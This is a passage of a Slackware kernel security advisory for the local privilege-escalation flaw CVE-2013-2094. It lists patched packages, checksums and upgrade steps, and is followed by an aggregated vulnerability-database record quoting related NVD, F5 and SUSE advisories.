ID SSA-2013-140-01 Type slackware Reporter Slackware Linux Project Modified 2013-05-20T15:28:44
Description
New Linux kernel packages are available for Slackware 13.37 and 14.0 to fix
a security issue.
Here are the details from the Slackware 14.0 ChangeLog:
patches/packages/linux-3.2.45/: Upgraded.
Upgraded to new kernels that fix CVE-2013-2094, a bug that can allow local
users to gain a root shell. Be sure to upgrade your initrd and reinstall
LILO after upgrading the kernel packages.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094
( Security fix *)
Where to find the new packages:
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated packages for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/linux-2.6.37.6-3/
Updated packages for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/linux-2.6.37.6-3/
Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/linux-3.2.45/
Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.45/
Upgrade the packages as root:
> upgradepkg kernel-*.txz
On Slackware 14.0 systems the kernel version has changed, so you will need
to rebuild your initrd if you are using one.
For Slackware 64-14.0 use this command:
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45 | bash
For Slackware 14.0 (32-bit) SMP, use this command:
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45-smp | bash
For Slackware 14.0 (32-bit) uniprocessor, use this command:
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45 | bash
Please note that "uniprocessor" has to do with the kernel you are running,
not with the CPU. Most systems should run the SMP kernel if they can
regardless of the number of cores the CPU has. If you aren't sure which
kernel you are running, run "uname -a". If you see SMP there, you are
running the SMP kernel and should use the 3.2.45-smp version when running
mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit
systems should always use 3.2.45 as the version.
For all systems (13.37 and 14.0):
If needed, edit your /etc/lilo.conf to adjust the version number on the
"image =" line. By default this will not have a version number and will
just follow the /boot/vmlinuz symlink, but you might need to make this
change if you've edited your lilo.conf manually.
Then, run "lilo" to reinstall the boot loader.
If there are no errors from LILO, reboot the system to begin using the
new kernel.
{"id": "SSA-2013-140-01", "type": "slackware", "bulletinFamily": "unix", "title": "kernel", "description": "New Linux kernel packages are available for Slackware 13.37 and 14.0 to fix\na security issue.\n\n\nHere are the details from the Slackware 14.0 ChangeLog:\n\npatches/packages/linux-3.2.45/*: Upgraded.\n Upgraded to new kernels that fix CVE-2013-2094, a bug that can allow local\n users to gain a root shell. Be sure to upgrade your initrd and reinstall\n LILO after upgrading the kernel packages.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/linux-2.6.37.6-3/\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/linux-2.6.37.6-3/\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/linux-3.2.45/\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/linux-3.2.45/\n\n\nMD5 signatures:\n\nSlackware 13.37 packages:\n99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz\nde925c472fb6c330eead07a3e767b65a kernel-generic-2.6.37.6-i486-3.txz\nd2f771b44accf311737c776fb5704805 kernel-generic-smp-2.6.37.6_smp-i686-3.txz\n9d0b7d34403e2a6a2e4936b7095b8e47 kernel-headers-2.6.37.6_smp-x86-3.txz\n30f60d09d7b1690ab314db56d6d65df5 kernel-huge-2.6.37.6-i486-3.txz\n9184cfc5b40d882336b443aef1897029 kernel-huge-smp-2.6.37.6_smp-i686-3.txz\n0b3644301f1404a0cdcc76f6adffeaf6 kernel-modules-2.6.37.6-i486-3.txz\nc130f273b9a2aa8cd54a3167ffa48aec kernel-modules-smp-2.6.37.6_smp-i686-3.txz\nc4fb8b49f8cb8e4cc62c53ad2a0a4c00 kernel-source-2.6.37.6_smp-noarch-3.txz\n\nSlackware x86_64 13.37 packages:\n99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz\n7efb7195c7d7dbc6ab3f40454670bc64 kernel-generic-2.6.37.6-x86_64-3.txz\ne9f689a3ee6f1937c33d0c9ea20ac9ff kernel-headers-2.6.37.6-x86-3.txz\n93bc2c1264a195e08ce9bb616832f29d kernel-huge-2.6.37.6-x86_64-3.txz\ncc788fc70ae0204c54228c40bce1e8f6 kernel-modules-2.6.37.6-x86_64-3.txz\ned5bbc7fb55c1a4c8e34de5a7a9c43fc kernel-source-2.6.37.6-noarch-3.txz\n\nSlackware 14.0 packages:\n99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz\n3e2a61b57a99907d99eb74e67ff57e0c kernel-generic-3.2.45-i486-1.txz\n6fbd61f493081e0526254ed0b7f1f735 kernel-generic-smp-3.2.45_smp-i686-1.txz\n3a3a54ba8c971b9b9f93551c97bb06d9 kernel-headers-3.2.45_smp-x86-1.txz\n778ff709728bf92c3adf5c7cdaab4dd7 kernel-huge-3.2.45-i486-1.txz\nb1416ff63c7d9b497292c2a9997bcd5c kernel-huge-smp-3.2.45_smp-i686-1.txz\n39312f1bbffc432c236f03b35c74b790 kernel-modules-3.2.45-i486-1.txz\n02927b33dfd01ccbb44f8276484802b1 kernel-modules-smp-3.2.45_smp-i686-1.txz\n6a2a843660fd349fe88de23d8db017df kernel-source-3.2.45_smp-noarch-1.txz\n\nSlackware x86_64 14.0 packages:\n99b5d3961b5be56497cd53510a9572ff kernel-firmware-20130512git-noarch-1.txz\n25804c3fc32f8dc4b8ba25c2de8f969e kernel-generic-3.2.45-x86_64-1.txz\n6ea9ec608564408bad734d8610c695b0 kernel-headers-3.2.45-x86-1.txz\n0b452f0c8ec46c4ce04fd2d9c78e7687 kernel-huge-3.2.45-x86_64-1.txz\neba43509f3118eb27c7b4e4918b87155 kernel-modules-3.2.45-x86_64-1.txz\n43b0d8457ab00cdf1f46461676fc1d71 kernel-source-3.2.45-noarch-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nOn Slackware 14.0 systems the kernel version has changed, so you will need\nto rebuild your initrd if you are using one.\n\nFor Slackware 64-14.0 use this command:\n/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45 | bash\n\nFor Slackware 14.0 (32-bit) SMP, use this command:\n/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45-smp | bash\n\nFor Slackware 14.0 (32-bit) uniprocessor, use this command:\n/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 3.2.45 | bash\n\nPlease note that "uniprocessor" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel if they can\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run "uname -a". If you see SMP there, you are\nrunning the SMP kernel and should use the 3.2.45-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 3.2.45 as the version.\n\nFor all systems (13.37 and 14.0):\n\nIf needed, edit your /etc/lilo.conf to adjust the version number on the\n"image =" line. By default this will not have a version number and will\njust follow the /boot/vmlinuz symlink, but you might need to make this\nchange if you've edited your lilo.conf manually.\n\nThen, run "lilo" to reinstall the boot loader.\n\nIf there are no errors from LILO, reboot the system to begin using the\nnew kernel.", "published": "2013-05-20T15:28:44", "modified": "2013-05-20T15:28:44", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.597338", "reporter": "Slackware Linux Project", "references": [], "cvelist": ["CVE-2013-2094"], "lastseen": "2019-05-30T07:37:12", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2094"]}, {"type": "f5", "idList": ["SOL14445", "F5:K14445"]}, {"type": "exploitdb", "idList": ["EDB-ID:25444", "EDB-ID:26131", "EDB-ID:33589"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:1042-1", "SUSE-SU-2013:0819-2", "OPENSUSE-SU-2013:0847-1", "SUSE-SU-2013:0819-1", "OPENSUSE-SU-2013:0951-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310841423", "OPENVAS:1361412562310881731", "OPENVAS:1361412562310841424", "OPENVAS:841432", "OPENVAS:841425", "OPENVAS:841449", "OPENVAS:1361412562310870993", "OPENVAS:870993", "OPENVAS:1361412562310120302", "OPENVAS:841423"]}, {"type": "ubuntu", "idList": ["USN-1828-1", "USN-1826-1", "USN-1827-1", "USN-1836-1", "USN-1839-1", "USN-1849-1", "USN-1825-1", "USN-1838-1"]}, {"type": "seebug", "idList": ["SSV:79777"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121976", "PACKETSTORM:126880"]}, {"type": "amazon", "idList": ["ALAS-2013-190"]}, {"type": "centos", "idList": ["CESA-2013:0830"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EC6E04EF12A9F66A20251DC5556474BC", "EXPLOITPACK:C8EE3F99CF50DA0F219FC69406122E2C"]}, {"type": "canvas", "idList": ["PERF_SWEVENT_INIT"]}, {"type": "redhat", "idList": ["RHSA-2013:0832", "RHSA-2013:0841", "RHSA-2013:0830", "RHSA-2013:0840"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2013-0830.NASL", "UBUNTU_USN-1849-1.NASL", "ORACLELINUX_ELSA-2013-2524.NASL", "UBUNTU_USN-1827-1.NASL", "UBUNTU_USN-1825-1.NASL", "SL_20130516_KERNEL_ON_SL6_X.NASL", "REDHAT-RHSA-2013-0832.NASL", "SLACKWARE_SSA_2013-140-01.NASL", "UBUNTU_USN-1828-1.NASL", "F5_BIGIP_SOL14445.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0911", "ELSA-2013-0830", "ELSA-2013-2525", "ELSA-2013-2524"]}, {"type": "zdt", "idList": ["1337DAY-ID-20880", "1337DAY-ID-22298"]}, {"type": "android", "idList": ["ANDROID:LIBPERF_EVENT"]}, {"type": "thn", "idList": ["THN:6C6DBC3B917F276B59D2AE2592818634", "THN:C8A4219AFC2880AC311776A8C10BAE97"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29436"]}, {"type": "cert", "idList": ["VU:774103"]}, {"type": "securelist", "idList": ["SECURELIST:52B19EC96333D6EAA616F8D528A8E64A"]}, {"type": "kitploit", "idList": ["KITPLOIT:5310354020898253604"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2669-1:6658C"]}], "modified": "2019-05-30T07:37:12", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2019-05-30T07:37:12", "rev": 2}, "vulnersScore": 6.9}, "affectedPackage": []}
{"cve": [{"lastseen": "2020-12-09T19:52:40", "description": "The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.", "edition": 5, "cvss3": {}, "published": "2013-05-14T20:55:00", "title": "CVE-2013-2094", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2094"], "modified": "2017-01-07T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.8.2"], "id": "CVE-2013-2094", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:38", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "edition": 1, "description": "\nF5 Product Development has assigned ID 421206 (BIG-IP) and ID 422534 (Enterprise Manager) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.0.0 - 9.6.1 \n| Linux kernel \nBIG-IP AAM | 11.4.0 | 11.4.1 | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.4.0 \n| 11.4.1 | Linux kernel \nBIG-IP Analytics | 11.2.0 - 11.4.0 | 11.4.1 \n11.0.0 - 11.1.0 | Linux kernel \nBIG-IP APM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 \n| Linux kernel \nBIG-IP ASM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.2.0 - 9.4.8 \n| Linux kernel \nBIG-IP Edge Gateway \n| 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 \n| Linux kernel \nBIG-IP GTM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.2.2 - 9.4.8 \n| Linux kernel \nBIG-IP Link Controller | 11.2.0 - 11.4.0 | 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.2.2 - 9.4.8 \n| Linux kernel \nBIG-IP PEM | 11.3.0 - 11.4.0 \n| 11.4.1 | Linux kernel \nBIG-IP PSM | 11.2.0 - 11.4.0 \n| 11.4.1 \n11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.4.5 - 9.4.8 \n| Linux kernel \nBIG-IP WebAccelerator | 11.2.0 - 11.3.0 \n| 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n9.4.0 - 9.4.8 | Linux kernel \nBIG-IP WOM | 11.2.0 - 11.3.0 \n| 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | Linux kernel \nARX | None | 6.0.0 - 6.4.0 \n5.0.0 - 5.3.1 | None \nEnterprise Manager | 3.0.0 - 3.1.1 | 2.0.0 - 2.3.0 \n1.6.0 - 1.8.0 | Linux kernel \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None\n\nTo mitigate this vulnerability, you can enable Appliance mode for vulnerable BIG-IP versions. For information about Appliance mode, refer to the following article:\n\n**Impact of action:** Appliance mode is designed to meet the needs of customers in especially sensitive sectors by limiting the BIG-IP system administrative access to match that of a typical network appliance and not a multi-user UNIX device. \n\n\n * [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>) \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-06T16:51:00", "published": "2013-06-06T19:40:00", "href": "https://support.f5.com/csp/article/K14445", "id": "F5:K14445", "title": "Linux kernel vulnerability CVE-2013-2094", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:58", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nTo mitigate this vulnerability, you can enable Appliance mode for vulnerable BIG-IP versions. For information about Appliance mode, refer to the following article:\n\n**Impact of action:** Appliance mode is designed to meet the needs of customers in especially sensitive sectors by limiting the BIG-IP system administrative access to match that of a typical network appliance and not a multi-user UNIX device. \n\n\n * SOL12815: Overview of Appliance mode \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-07-25T00:00:00", "published": "2013-06-06T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/400/sol14445.html", "id": "SOL14445", "title": "SOL14445 - Linux kernel vulnerability CVE-2013-2094", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "This update to the SUSE Linux Enterprise 11 SP2 kernel\n fixes the following critical security issue:\n\n * A bounds checking problem in the perf systemcall\n could be used by local attackers to crash the kernel or\n execute code in kernel context. (CVE-2013-2094\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094</a>\n > )\n", "edition": 1, "modified": "2013-05-22T02:04:20", "published": "2013-05-22T02:04:20", "id": "SUSE-SU-2013:0819-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00008.html", "title": "Security update for the Linux Kernel (x86) (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:03", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The SUSE Linux Enterprise 11 SP2 RT kernel has been updated\n to fix a critical security issue.\n\n * CVE-2013-2094: A bounds checking problem in the perf\n systemcall could be used by local attackers to crash the\n kernel or execute code in kernel context.\n", "edition": 1, "modified": "2013-05-24T17:04:28", "published": "2013-05-24T17:04:28", "id": "SUSE-SU-2013:0819-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00009.html", "title": "Security update for Linux kernel (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:03:49", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0290", "CVE-2013-2094"], "description": "The openSUSE 12.3 kernel was updated to fix a critical\n security issue, other security issues and several bugs.\n\n Security issues fixed: CVE-2013-2094: The perf_swevent_init\n function in kernel/events/core.c in the Linux kernel used\n an incorrect integer data type, which allowed local users\n to gain privileges via a crafted perf_event_open system\n call.\n\n CVE-2013-0290: The __skb_recv_datagram function in\n net/core/datagram.c in the Linux kernel did not properly\n handle the MSG_PEEK flag with zero-length data, which\n allowed local users to cause a denial of service (infinite\n loop and system hang) via a crafted application.\n\n Bugs fixed:\n - qlge: fix dma map leak when the last chunk is not\n allocated (bnc#819519).\n\n - ACPI / thermal: do not always return\n THERMAL_TREND_RAISING for active trip points (bnc#820048).\n\n - perf: Treat attr.config as u64 in perf_swevent_init()\n (bnc#819789, CVE-2013-2094).\n\n - cxgb4: fix error recovery when t4_fw_hello returns a\n positive value (bnc#818497).\n\n - kabi/severities: Ignore drivers/mfd/ucb1400_core It\n provides internal exports to UCB1400 drivers, that we\n have just disabled.\n\n - Fix -devel package for armv7hl armv7hl kernel flavors in\n the non-multiplatform configuration (which is the default\n for our openSUSE 12.3 release), needs more header files\n from the machine specific directories to be included in\n kernel-devel.\n\n - Update config files: disable UCB1400 on all but ARM\n Currently UCB1400 is only used on ARM OMAP systems, and\n part of the code is dead code that can't even be\n modularized.\n - CONFIG_UCB1400_CORE=n\n - CONFIG_TOUCHSCREEN_UCB1400=n\n - CONFIG_GPIO_UCB1400=n\n\n - rpm/config.sh: Drop the ARM repository, the KOTD will\n build against the "ports" repository of openSUSE:12.3\n\n - mm/mmap: check for RLIMIT_AS before unmapping\n (bnc#818327).\n\n - rpm/kernel-spec-macros: Properly handle KOTD release\n numbers with .g<commit> suffix\n\n - rpm/kernel-spec-macros: Drop the %release_num macro We no\n longer put the -rcX tag into the release string.\n\n - xen-pciback: notify hypervisor about devices intended to\n be assigned to guests.\n\n - unix/stream: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: peek beyond 0-sized skbs (bnc#803931\n CVE-2013-0290).\n - net: fix infinite loop in __skb_recv_datagram()\n (bnc#803931 CVE-2013-0290).\n\n - TTY: fix atime/mtime regression (bnc#815745).\n\n - md/raid1,raid10: fix deadlock with freeze_array()\n (813889).\n - md: raid1,10: Handle REQ_WRITE_SAME flag in write bios\n (bnc#813889).\n\n - KMS: fix EDID detailed timing vsync parsing.\n - KMS: fix EDID detailed timing frame rate.\n\n - Add Netfilter/ebtables support Those modues are needed\n for proper OpenStack support on ARM, and are also enabled\n on x86(_64)\n\n", "edition": 1, "modified": "2013-06-10T18:16:01", "published": "2013-06-10T18:16:01", "id": "OPENSUSE-SU-2013:0951-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-06/msg00009.html", "title": "kernel: security and bugfix update (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:52:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2850", "CVE-2013-0290", "CVE-2013-2094"], "description": "The openSUSE 12.2 kernel was updated to fix security issue\n and other bugs.\n\n Security issues fixed: CVE-2013-2850: Incorrect strncpy\n usage in the network listening part of the iscsi target\n driver could have been used by remote attackers to crash\n the kernel or execute code.\n\n This required the iscsi target running on the machine and\n the attacker able to make a network connection to it (aka\n not filtered by firewalls).\n\n CVE-2013-2094: The perf_swevent_init function in\n kernel/events/core.c in the Linux kernel used an incorrect\n integer data type, which allowed local users to gain\n privileges via a crafted perf_event_open system call.\n\n CVE-2013-0290: The __skb_recv_datagram function in\n net/core/datagram.c in the Linux kernel did not properly\n handle the MSG_PEEK flag with zero-length data, which\n allowed local users to cause a denial of service (infinite\n loop and system hang) via a crafted application.\n\n Bugs fixed:\n - reiserfs: fix spurious multiple-fill in\n reiserfs_readdir_dentry (bnc#822722).\n\n - reiserfs: fix problems with chowning setuid file w/\n xattrs (bnc#790920).\n\n - qlge: fix dma map leak when the last chunk is not\n allocated (bnc#819519).\n\n - Update config files: disable UCB1400 on all but ARM\n Currently UCB1400 is only used on ARM OMAP systems, and\n part of the code is dead code that can't even be\n modularized.\n - CONFIG_UCB1400_CORE=n\n - CONFIG_TOUCHSCREEN_UCB1400=n\n - CONFIG_GPIO_UCB1400=n\n\n - mm/mmap: check for RLIMIT_AS before unmapping\n (bnc#818327).\n - unix/stream: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: fix peeking with an offset larger than data\n in queue (bnc#803931 CVE-2013-0290).\n - unix/dgram: peek beyond 0-sized skbs (bnc#803931\n CVE-2013-0290).\n\n", "edition": 1, "modified": "2013-06-19T11:04:11", "published": "2013-06-19T11:04:11", "id": "OPENSUSE-SU-2013:1042-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-06/msg00017.html", "title": "kernel: security and bugfix update (critical)", "type": "suse", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1797", "CVE-2013-1767", "CVE-2013-1774", "CVE-2013-0913", "CVE-2013-1928", "CVE-2013-2094", "CVE-2013-1796", "CVE-2013-1798"], "description": "The openSUSE 12.1 kernel was updated to fix a severe\n secrutiy issue and various bugs.\n\n Security issues fixed: CVE-2013-2094: The perf_swevent_init\n function in kernel/events/core.c in the Linux kernel used\n an incorrect integer data type, which allowed local users\n to gain privileges via a crafted perf_event_open system\n call.\n\n CVE-2013-1774: The chase_port function in\n drivers/usb/serial/io_ti.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer\n dereference and system crash) via an attempted /dev/ttyUSB\n read or write operation on a disconnected Edgeport USB\n serial converter.\n\n CVE-2013-1928: The do_video_set_spu_palette function in\n fs/compat_ioctl.c in the Linux kernel lacked a certain\n error check, which might have allowed local users to obtain\n sensitive information from kernel stack memory via a\n crafted VIDEO_SET_SPU_PALETTE ioctl call on a /dev/dvb\n device.\n\n CVE-2013-1796: The kvm_set_msr_common function in\n arch/x86/kvm/x86.c in the Linux kernel did not ensure a\n required time_page alignment during an MSR_KVM_SYSTEM_TIME\n operation, which allowed guest OS users to cause a denial\n of service (buffer overflow and host OS memory corruption)\n or possibly have unspecified other impact via a crafted\n application.\n\n CVE-2013-1797: Use-after-free vulnerability in\n arch/x86/kvm/x86.c in the Linux kernel allowed guest OS\n users to cause a denial of service (host OS memory\n corruption) or possibly have unspecified other impact via a\n crafted application that triggers use of a guest physical\n address (GPA) in (1) movable or (2) removable memory during\n an MSR_KVM_SYSTEM_TIME kvm_set_msr_common operation.\n\n CVE-2013-1798: The ioapic_read_indirect function in\n virt/kvm/ioapic.c in the Linux kernel did not properly\n handle a certain combination of invalid IOAPIC_REG_SELECT\n and IOAPIC_REG_WINDOW operations, which allowed guest OS\n users to obtain sensitive information from host OS memory\n or cause a denial of service (host OS OOPS) via a crafted\n application.\n\n CVE-2013-1767: Use-after-free vulnerability in the\n shmem_remount_fs function in mm/shmem.c in the Linux kernel\n allowed local users to gain privileges or cause a denial of\n service (system crash) by remounting a tmpfs filesystem\n without specifying a required mpol (aka mempolicy) mount\n option.\n\n CVE-2013-0913: Integer overflow in\n drivers/gpu/drm/i915/i915_gem_execbuffer.c in the i915\n driver in the Direct Rendering Manager (DRM) subsystem in\n the Linux kernel allowed local users to cause a denial of\n service (heap-based buffer overflow) or possibly have\n unspecified other impact via a crafted application that\n triggers many relocation copies, and potentially leads to a\n race condition.\n\n Bugs fixed:\n - qlge: fix dma map leak when the last chunk is not\n allocated (bnc#819519).\n\n - TTY: fix atime/mtime regression (bnc#815745).\n\n - fs/compat_ioctl.c: VIDEO_SET_SPU_PALETTE missing error\n check (bnc#813735).\n\n - USB: io_ti: Fix NULL dereference in chase_port()\n (bnc#806976, CVE-2013-1774).\n\n - KVM: Convert MSR_KVM_SYSTEM_TIME to use\n gfn_to_hva_cache_init (bnc#806980 CVE-2013-1797).\n - KVM: Fix bounds checking in ioapic indirect register read\n (bnc#806980 CVE-2013-1798).\n - KVM: Fix for buffer overflow in handling of\n MSR_KVM_SYSTEM_TIME (bnc#806980 CVE-2013-1796).\n - kabi/severities: Allow kvm module abi changes - modules\n are self consistent\n\n - loopdev: fix a deadlock (bnc#809748).\n - block: use i_size_write() in bd_set_size() (bnc#809748).\n\n - drm/i915: bounds check execbuffer relocation count\n (bnc#808829,CVE-2013-0913).\n\n - tmpfs: fix use-after-free of mempolicy object\n (bnc#806138, CVE-2013-1767).\n\n", "edition": 1, "modified": "2013-05-31T16:04:13", "published": "2013-05-31T16:04:13", "id": "OPENSUSE-SU-2013:0847-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00018.html", "title": "kernel: security and bugfix update (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-02-06T13:10:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Check for the Version of 